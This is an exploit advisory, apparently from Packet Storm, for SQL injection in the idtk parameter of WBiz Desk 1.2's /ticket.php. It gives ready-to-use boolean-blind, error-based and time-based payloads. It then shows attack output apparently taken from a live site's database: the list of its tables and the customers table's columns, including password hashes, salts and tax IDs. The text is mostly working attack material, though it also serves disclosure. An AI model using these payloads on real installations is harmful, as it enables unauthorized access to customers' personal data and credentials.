Exploit for WBiz Desk 1.2 SQL Injection

Name: Exploit for WBiz Desk 1.2 SQL Injection
Rating: 5 (117 reviews)
2023-05-23 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:172506
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : https://www.codester.com/items/5641/ │  
│ Vendor : WeBiz Digital │  
│ Software : WBiz Desk 1.2 │  
│ Vuln Type: SQL Injection │  
│ Impact : Database Access │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and │  
│ damage to a company's reputation. │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Path: /ticket.php  
  
http://website/ticket.php?tk=1&idtk=[SQLi]&action=close  
  
  
GET parameter 'idtk' is vulnerable to SQL Injection  
  
---  
Parameter: idtk (GET)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  
Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close  
---  
  
  
[+] Starting the Attack  
  
fetching current database  
current database: 'wbizdesk_*****_com_br'  
  
  
fetching tables  
  
[12 tables]  
+----------------+  
| accounts |  
| category |  
| chat |  
| config |  
| customers |  
| departments |  
| email_template |  
| log_tb |  
| messages |  
| tickets |  
| tutorial |  
| users |  
+----------------+  
  
  
fetching columns for table 'customers'  
  
[19 columns]  
+--------------+-------------------+  
| Column | Type |  
+--------------+-------------------+  
| name | varchar(160) |  
| number | varchar(11) |  
| status | enum('S','B','N') |  
| address | varchar(255) |  
| city | varchar(160) |  
| company | varchar(160) |  
| country | varchar(60) |  
| cpf_cnpj | varchar(60) |  
| email | varchar(255) |  
| id | int(11) |  
| ip | varchar(90) |  
| neighborhood | varchar(160) |  
| obs | text |  
| os | varchar(160) |  
| pass | varchar(160) |  
| phrase | varchar(160) |  
| salt | varchar(255) |  
| state | varchar(160) |  
| zipcode | varchar(60) |  
+--------------+-------------------+  
  
  
[-] Done